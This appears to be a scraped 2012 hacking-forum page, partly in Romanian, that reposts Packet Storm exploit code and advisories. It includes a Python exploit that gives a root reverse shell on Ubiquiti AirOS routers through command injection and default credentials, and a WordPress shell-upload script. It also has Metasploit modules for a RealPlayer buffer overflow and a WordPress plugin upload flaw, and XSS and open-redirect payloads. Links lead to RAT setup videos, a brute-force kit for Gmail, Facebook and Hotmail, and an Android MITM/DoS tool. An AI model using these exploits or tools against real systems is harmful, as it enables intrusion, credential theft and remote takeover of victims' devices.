Praetorian503

Ubiquiti AirOS versions 5.5.2 and below suffer from a remote post-authentication root-level command execution vulnerability. #!/usr/bin/python #+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Ubiquiti AirOS <= 5.5.2 Remote POST-Auth Root Command Execution # Date : 12-28-2012 # Author : xistence (xistence<[AT]>0x90.nl) # Software link : http://www.ubnt.com/eula/?BACK=/downloads/XM-v5.5.2.build14175.bin # Vendor site : http://www.ubnt.com/ # Version : 5.5.2 and lower # Tested on : PicoStation M2 (hardware) # # Vulnerability : The http://<IP>/test.cgi "essid" parameter is not sanitized for input which allows for execution of operating # system commands. The parameter input field can be like this to create a file /tmp/test.txt: # "LINKTEST & /bin/touch /tmp/test.txt #" # Authentication to the web site is necessary to exploit this vulnerability. #+--------------------------------------------------------------------------------------------------------------------------------+ import urllib, urllib2, cookielib, sys, random, mimetools, mimetypes, itertools, time print "" print "[*] Ubiquiti AirOS <= 5.5.2 Remote POST-Auth Root Command Execution - xistence (xistence<[at]>0x90.nl) - 2012-12-28" print "" if (len(sys.argv) != 4): print "[*] Usage: " + sys.argv[0] + " <rhost> <lhost> <lport>" print "" exit(0) rhost = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] webUser = "ubnt" webPass = "ubnt" # Create a random file with 8 characters filename = '' for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',8): filename+=i filename +=".sh" shellCmd = '& echo "mknod /tmp/backpipe p ; telnet ' + lhost + ' ' + lport + ' 0</tmp/backpipe | /bin/sh -C 1>/tmp/backpipe 2>/tmp/backpipe ; rm -rf /tmp/backpipe ; rm -rf /tmp/' + filename + '" > /tmp/' + filename + ' ; chmod +x /tmp/' + filename + ' ; /bin/sh /tmp/' + filename + ' #' class MultiPartForm(object): """Accumulate the data to be used when posting a form.""" def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): """Add a simple field to the form data.""" self.form_fields.append( ( name, value ) ) return def __str__(self): """Return a string representing the form data, including attached files.""" # Build a list of lists, each containing "lines" of the # request. Each part is separated by a boundary string. # Once the list is built, return a string where each # line is separated by '\r\n'. parts = [] part_boundary = '--' + self.boundary # Add the form fields parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) # Flatten the list and add closing boundary marker, # then return CR+LF separated data flattened = list( itertools.chain( *parts) ) flattened.append( '--' + self.boundary + '--' ) flattened.append( '' ) return '\r\n'.join( flattened ) # Create the form with simple fields form = MultiPartForm() form.add_field( 'uri', '' ) form.add_field( 'username', webUser ) form.add_field( 'password', webPass ) form2 = MultiPartForm() form2.add_field( 'essid', 'LINKTEST ' + shellCmd ) form2.add_field( 'channel', '2412' ) form2.add_field( 'rssithresh', '13' ) form2.add_field( 'file_url', '' ) form2.add_field( 'action', 'test' ) # Our Cookie Jar cj = cookielib.CookieJar() opener = urllib2.build_opener( urllib2.HTTPCookieProcessor( cj ) ) # Just open the default url to grab the cookies and put them in the jar print "[+] Opening default page [http://%s] to store cookies" % rhost resp = opener.open( "http://%s" %rhost ) # Create our multi-part body + headers login POST request print "[+] Logging in with user [%s] and password [%s] at host [%s]" % ( webUser, webPass, rhost ) resp = urllib2.Request( "http://%s/login.cgi" % rhost ) body = str( form ) resp.add_header( 'Content-type', form.get_content_type() ) resp.add_header( 'Content-length', len( body ) ) resp.add_data( body ) request = opener.open( resp ).read() # Create our multi-part body + headers command execution POST request print "[+] Executing reverse shell commands [file = /tmp/" + filename + "], this might take up to a minute before a response is received in your netcat shell" resp = urllib2.Request( "http://%s/test.cgi" % rhost ) body = str( form2 ) resp.add_header( 'Content-type', form2.get_content_type() ) resp.add_header( 'Content-length', len( body ) ) resp.add_data( body ) request = opener.open( resp ).read() time.sleep(30) print "[+] Done, check your netcat reverse shell on ip [%s] port [%s]" % ( lhost, lport ) Source: Packet Storm

The WordPress TwentyTen theme suffers from a remote shell upload vulnerability. ################################################## # Description : Wordpress Themes - TwentyTen Remote File Upload # Author : Agd_Scorp # Contact: vorscorp@hotmail.com # Version : 1.5.x/1.4.x/1.3.x/1.2.x/1.1.x # Link : http://wordpress.org/extend/themes/twentyten # Date : Friday, December 28, 2012 # Dork : inurl:/wp-content/themes/twentyten ################################################## Fact : this exploit only works if the LOOP_ARRAY functions are enabled in the server, which is disabled by default, although, if the administrator has ever configed the website, the array functions might've been enabled on by default, and cURL must be enabled too. Exploit : <?php $uploadfile="scorp.php.gif"; $ch = curl_init("http://www.site.com/wordpress/wp-content/themes/twentyten/loop.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$attachfile")); curl_setopt($ch, CURLOPT_POSTFIELDS, array('opt[]'=>"@$connector?rate=50&get_file=0?upload="@$attachfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.site.com/wordpress/wp-content/themes/twentyten/scorp.php.gif Filename : $postResult output scorp.php.gif <?php phpinfo(); ?> Source: Packet Storm

De-al dracu' nu-l fac.

C-Panel suffers from a reflective cross site scripting vulnerability in dir.html. Details ============= Product: Cpanel Security-Risk: High Remote-Exploit: yes Vendor-URL: http://www.cpanel.net Advisory-Status: NotPublished Credits ============= Discovered by: Rafay Baloch of RafayHackingArticles(RHA) Affected Products: ============= Cpanel's Latest Version Description ============= "Simple website management." More Details ============= I have discsovered a non persistent Cross site scripting (XSS) inside Cpanel, the vulnerability can be easily exploited and can be used to steal cookies, perform phishing attacks and other various attacks compromising the security of a user. Proof of Concept ============= Log into your CPanel accoutn and navigate to the following link: https://gator1347.hostgator.com:2083/frontend/x3/files/dir.html?showhidden=1&dir= Now insert your xss payload inside Dir parameter. Exploit ============= https://localhost/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E Solution ============= Edit the source code to ensure that input is properly sanitized. Source: Packet Storm

This Metasploit module exploits a stack based buffer overflow on RealPlayer versions 15.0.6.14 and below. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This Metasploit module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'RealPlayer RealMedia File Handling Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109. }, 'License' => MSF_LICENSE, 'Author' => [ 'suto <suto[at]vnsecurity.net>' # Vulnerability discovery, metasploit module ], 'References' => [ [ 'CVE', '2012-5691' ], [ 'OSVDB', '88486' ], [ 'BID', '56956' ], [ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process' }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, 'Space' => 2000 }, 'Targets' => [ [ 'Windows XP SP3 / Real Player 15.0.5.109', { 'Ret' => 0x63f2b4b5, # ppr from rpap3260.dll 'OffsetOne' => 2312, # Open via double click 'OffsetTwo' => 2964 # Open via drag and drop } ] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 14 2012', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class) end def exploit buffer = payload.encoded buffer << rand_text(target['OffsetOne'] - buffer.length) # Open the file via double click buffer << generate_seh_record(target.ret) buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetOne'] + 8}").encode_string buffer << rand_text(target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player buffer << generate_seh_record(target.ret) buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetTwo'] + 8}").encode_string buffer << rand_text(7000) # Generate exception content = "[InternetShortcut]\nURL=" filecontent = content+buffer file_create(filecontent) end end Source: Penetration Testing Software | Metasploit

This Metasploit module exploits a vulnerability found in WordPress plugin Asset-Manager versions 2.0 and below. By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'msf/core/exploit/php_exe' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability', 'Description' => %q{ This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress plugin. By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => [ 'Sammy FORGIT', # initial discovery 'James Fitts <fitts.james[at]gmail.com>' # metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '82653' ], [ 'BID', '53809' ], [ 'EDB', '18993' ], [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ] ], 'Payload' => { 'BadChars' => "\x00", }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 26 2012')) register_options( [ OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) ], self.class) end def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) data = Rex::MIME::Message.new data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{peer} - Uploading payload #{payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) if not res or res.code != 200 or res.body !~ /#{payload_name}/ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload #{payload_name}") res = send_request_raw({ 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", 'method' => 'GET' }) if res and res.code != 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed") end end end Source: Penetration Testing Software | Metasploit

SonicWall Email Security version 7.4.1.x suffers from a persistent cross site scripting vulnerability. Title: ====== SonicWall Email Security 7.4.1.x - Persistent Web Vulnerability Date: ===== 2012-12-21 References: =========== http://www.vulnerability-lab.com/get_content.php?id=768 VL-ID: ===== 768 Common Vulnerability Scoring System: ==================================== 4.1 Introduction: ============= While most businesses now have some type of anti-spam protection, many must deal with cumbersome management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership. SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL Email Security solutions employ a variety of proven and patented technology designed to block spam and other threats effectively, easily and economically. With innovative protection techniques for both inbound and outbound email plus unique management tools, the Email Security platform delivers superior email protection today—while standing ready to stop the new attacks of tomorrow. SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization, ease migration and reduce capital costs. (Copy of the Vendor Homepage: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html) Abstract: ========= The Vulnerability Laboratory Research Team discovered a persistent web vulnerabilities in the official Dell SonicWall Email Security (7.4.1.7429) Application. Report-Timeline: ================ 2012-11-18: Researcher Notification & Coordination 2012-11-20: Vendor Notification 2012-11-21: Vendor Response/Feedback 2012-12-17: Vendor Fix/Patch (v7.4.2) 2012-12-21: Public Disclosure Status: ======== Published Affected Products: ================== DELL Product: SonicWall - Email Security v7.4.1.7429 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent input validation vulnerability is detected in the official Dell SonicWall Email Security (7.4.1.7429) Application. The vulnerability typus allows an attacker to inject own malicious script code in the vulnerable module on application side (persistent). The vulnerability is located in the Host Konfiguration > Einstellungen für CIFS-Bereitstellung > section when processing to request via the `Bereistellunge testen` module the bound vulnerable [Name des freigegebenen Laufwerks] [Benutzer-ID für Remoteanmeldung] [Kennwort für Remoteanmeldung] application parameters. The persistent injected script code will be executed directly out of the `system command failed` web application exception-handling. The vulnerability can be exploited with a low (restricted) privileged application user account and low or medium required user interaction. Successful exploitation of the vulnerability result in persistent session hijacking, persistent phishing, external redirect, external malware loads and persistent vulnerable module context manipulation. Vulnerable Section(s): [+] System > Host Konfiguration > Einstellungen für CIFS-Bereitstellung Vulnerable Module(s): [+] [Bereitstellung testen] - Exception Handling Vulnerable Parameter(s): [+] [Name des freigegebenen Laufwerks] [Benutzer-ID für Remoteanmeldung] [Kennwort für Remoteanmeldung] Proof of Concept: ================= The persistent web vulnerabilities can be exploited by remote attackers with low privileged application user account & low required user inter action. For demonstration or reproduce ... Review: [Bereitstellung testen] - Exception Handling [System Command Failed] <div id="modalText" class="bubble_text">{ 127.0.0.1:337 ?">?????<[PERSISTENT INJECTED SCRIPT CODE!]")" <="" } <br=""><[PERSISTENT INJECTED SCRIPT CODE!]>System command failed.</div> Review: settings_host_config.html <div id="contentSection"> <div style="border-radius: 10px 10px 10px 10px; display: none;" id="modalBubble" class="warning_bubble_content"> <div id="modalTitle" class="bubble_title">Aktualisieren.</div> <div id="modalText" class="bubble_text">{ 127.0.0.1 ? "><[PERSISTENT INJECTED SCRIPT CODE!];)" <="" }<br=""> <[PERSISTENT INJECTED SCRIPT CODE!]>System command failed.</div> </div> Solution: ========= To patch/fix the persistent web vulnerabilities parse the exception-handling output parameter listing. Restrict the input fields (parameters) and disallow special chars and obviously forbidden strings. 2012-12-17: Vendor Fix/Patch (v7.4.2) Note: The vulnerability has been addressed by sonicwall in december 2012. Sonicwall provids all the customers an upgrade/update to version 7.4.2. Risk: ===== The security risk of the persistent web vulnerabilities are estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: VULNERABILITY LAB - SECURITY RESEARCH LABORATORY

Log Analyzer version 3.6.0 suffers from a cross site scripting vulnerability. Title: ====== Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability Date: ===== 2012-12-20 References: =========== http://www.vulnerability-lab.com/get_content.php?id=792 Vendor: http://loganalyzer.adiscon.com/security-advisories/loganalyzer-cross-site-scripting-vulnerability-in-oracle_query-paramater VL-ID: ===== 792 Common Vulnerability Scoring System: ==================================== 1.5 Introduction: ============= LogAnalyzer is part of Adiscon`s MonitorWare line of monitoring applications. It runs both under Windows and Unix/Linux. The database can be populated by MonitorWare Agent, WinSyslog or EventReporter on the Windows side and by rsyslog on the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some other members of the product line). (Copy of the Vendor Homepage: http://loganalyzer.adiscon.com/ ) Abstract: ========= An independent vulnerability laboratory researcher discovered a cross site scripting vulnerability in the log analyzer v3.6.0 web application. Report-Timeline: ================ 2012-12-20: Public or Non-Public Disclosure Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= Low Details: ======== A client side cross-site scripting vulnerability is detected in the LogAnalyzer 3.6.0 web application. The vulnerability allows an remote attacker with high required user interaction to force client side xss requests. The vulnerability is located in the asktheoracle.php file with the bound vulnerable oracle_query parameter request. An attackers can force client side requests to execute arbitrary script code by using the oracle_query parameter. Successful exploitation of the vulnerability results in client side execution of inject script, client side phishing, client side module context manipulation and evil unautorized external redirects. Vulnerable File(s): [+] asktheoracle.php Vulnerable Parameter(s): [+] oracle_query Proof of Concept: ================= The client side cross site scripting vulnerability can be exploited by remote attackers with medium or high required user interaction and without privileged application user account. http://192.168.1.10:8080/loganalyzer-3.6.0/asktheoracle.php?type=searchstr&oracle_query=[CLIENT SIDE SCRIPT CODE!] Note: The 'oracle_query' parameter didn't sanitize properly for asktheoracle.php page. Solution: ========= Upgrade to the latest version of Log Analyzer 3.6.1 Risk: ===== The security risk of the client side cross site scripting web vulnerability is estimated as low(+) Credits: ======== Mohd Izhar Ali - [http://johncrackernet.blogspot.com] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: VULNERABILITY LAB - SECURITY RESEARCH LABORATORY

Open-Realty CMS version 3.x suffers from a cross site scripting vulnerability. 1. OVERVIEW Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site Scripting (XSS). 2. BACKGROUND Open-Realty is the world's leading real estate listing marketing and management CMS application, and has enjoyed being the real estate web site software of choice for professional web site developers since 2002. 3. VULNERABILITY DESCRIPTION Multiple parameters are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 3.x 5. PROOF-OF-CONCEPT/EXPLOIT /admin/ajax.php (parameter: title, full_desc, ta) /////////////////////////////////////////////////////// POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1 Host: localhost Content-Length: 574 Origin: http://localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7; edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2&notes=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate= /////////////////////////////////////////////////////// POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 112 Origin: http://localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Referer: http://localhost/admin/index.php?action=edit_blog_post&id=65 Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09; blogID=65&title=about+us&ta='"><script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us /////////////////////////////////////////////////////// 6. SOLUTION The vendor has not responded to the report since 2012-11-17. It is recommended that an alternate software package be used in its place. 7. VENDOR Transparent Technologies Inc. http://www.transparent-support.com 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-11-17: Vulnerability Reported 2012-12-25: Vulnerability Disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss Open-Realty Home Page: http://www.open-realty.org/ #yehg [2012-12-25] --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd Source: yehg.net

Pentru a se considera un challenge, trebuie sa ne dai un target vulnerable. Asta suna a "spargeti voi acest site ca eu nu stiu".

http://www.youtube.com/watch?v=e8mQitiDrHU

We will show here how we get into a system taking advantage of a buffer overflow vulnerability. When we finally get into the system we will setup a permanent connection to this computer. Source: YouTube

How to set up a RAT (Remote Administration Tool) in SET using RATTE. A RAT will allow you to control the victim's pc remotely. Currently RATTE can bypass some of the antivirus software too. http://www.youtube.com/watch?v=e7F-lQlPfyw&feature=player_embedded Source: YouTube

This is a tutorial on how to use Backtrack 4 R2, and the airpwn functions inside of it, to inject wireless packets into other wireless clients, making them view abnormal information, which you have created. Source: YouTube

Description: In this video you will learn how to configure VPN connection using network-manager utility. If you follow this video so you can easily make VPN connective on backtrack. NetworkManager has pluggable support for VPN. Source: YouTube

This is a tutorial in Metasploit framework 3 inside of Backtrack 4 R2, this tutorial covers the basics of metasploit, and how to exploit a fresh format of Windows XP Home SP3, with Internet Explorer 6 installed, IE6 will be exploited to gain full access over the clients machine. Source: YouTube

"E Roman deci n-are bani". Ma rog.. tot a venit

Tools: - Scripts de F.Bruta: Gmail, Facebook y Hotmail. Programs: -Advanced Office Password Recovery Professional 5.02 elcomsoft wireless security auditor V50.25 Download: https://www.dropbox.com/s/2lawvsw5t8byz6y/Brute%20Force%20V1%20%28TEU%29.zip Password: Aryenal.Bt

Android Network Toolkit - Anti - Universal app. Network scanner, sniffer, MITM, Remote Exploits! Expandable functionality through plugins. Anti displays a map of your network, scan for active devices and vulnerabilities, and displays relevant information: green LED signals the active devices, yellow - on the available ports and red - the found vulnerabilities. In addition, each device will have an icon indicating the type of device. After the scan is complete, Anti generate automatic report showing your existing vulnerabilities or bad practices used, and suggest how to fix each one.Once Anti analyze your network, you can select the method of attack:Scan - will scan the selected target for open ports and vulnerabilities. Once Anti (Android Network Toolkit) analyze your network, you can select the method of attack: Scan - will scan the selected target for open ports and vulnerabilities. You can also select a specific script for a more advanced / targeted scan. Spy - packets sent from / to the selected device will be intercepted and displayed on your phone in a handy gallery. If you choose as the target subnet / range, it will display all traffic on the network packets to all connected devices. Another feature of the plug-Spy is the interception of web sites and unprotected (not HTTPS) logins / passwords that are displayed in the lower area. DOS - the selected target will be subject to DoS-attack in which their access to the Internet will be either impossible fully or substantially impeded. Replace images - all images transferred to / from the target, the logo will be replaced by Anti, thus preventing the display of any image in the browser when browsing the Internet, except for the nice looking logo Anti ... MITM - target will be subject to attack, "the man in the middle", which is an advanced attack used mainly in combination with other types of attacks. This allows you to use special filters to manipulate the data transmitted over the network. Users can also add your own filters MITM, to create an even more MITM attacks. Attack - will be initiated attack soft targets using our cloud service. In case of a successful action, it allows you to control the device remotely from your phone. Report - will generate a report on vulnerabilities with conclusions, recommendations and tips to deal with the found vulnerabilities or bad practices used. Download: Download Anti.apk from Sendspace.com - send big files the easy way

CubeCart versions 4.4.6 and below suffer from an open URL redirection vulnerability. 1. OVERVIEW CubeCart 4.4.6 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND CubeCart is an "out of the box" ecommerce shopping cart software solution which has been written to run on servers that have PHP & MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 4.4.6 and lower versions contain a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not properly sanitise the parameters, "r" and "redir". This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choice. 4. VERSIONS AFFECTED 4.4.6 and lower 5. Affected URLs and Parameters /index.php (r parameter) /index.php (redir parameter) /index.php?_g=sw&r=//yehg.net/ /index.php?_a=login&redir=//yehg.net 6. SOLUTION The CubeCart 4.x version family is no longer maintained by the vendor. Upgrade to the currently supported latest latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-06-22: CubeCart 4.x in End-of-Support/Maintenance circle 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_open_url_redirection CubeCart Home Page: http://cubecart.com/ CubeCart Bug-Fix Announcement: http://forums.cubecart.com/topic/45456-cubecart-447-released/ CubeCart4 End-of-Life Announcement: http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/ #yehg [2012-12-24] --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd Source: YGN Ethical Hacker Group :: Security Research

CubeCart versions 5.0.7 and below suffer from an open URL redirection vulnerability. 1. OVERVIEW CubeCart 5.0.7 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND CubeCart is an "out of the box" ecommerce shopping cart software solution which has been written to run on servers that have PHP & MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION CubeCart 5.0.7 and lower versions contain a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not properly sanitise the "redir" parameter. This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choice. 4. VERSIONS AFFECTED 5.0.7 and lower 5. Affected URL and Parameter /admin.php (redir parameter) /admin.php?redir=//yehg.net/%3f (Redirect after login) 6. SOLUTION Upgrade to the latest CubeCart version - 5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-03-24: Vulnerability reported 2012-12-24: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_open_url_redirection CubeCart Home Page: http://cubecart.com/ #yehg [2012-12-24] Source: YGN Ethical Hacker Group :: Security Research

